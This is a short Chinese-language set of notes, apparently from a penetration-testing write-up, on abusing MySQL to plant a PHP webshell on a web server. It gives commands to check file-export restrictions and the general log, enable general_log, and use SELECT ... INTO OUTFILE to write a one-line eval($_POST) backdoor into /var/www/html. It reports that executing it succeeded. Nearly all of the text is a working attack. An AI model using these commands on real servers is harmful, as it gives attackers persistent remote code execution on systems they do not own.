• 查看MySQL是否限制导入导

    1
    show global variables like '%secure%';

  • 查看MySQL日志状态

    1
    show variables like '%general%';

  • 利用日志文件写入一句话木马 开启general_log :

    1
    set global general_log='on';

  • 尝试直接通过into outfile写入一句话木马,访问执行成功

    1
    select '<?php eval($_POST[shy]); ?>' into outfile '/var/www/html/shyy.php';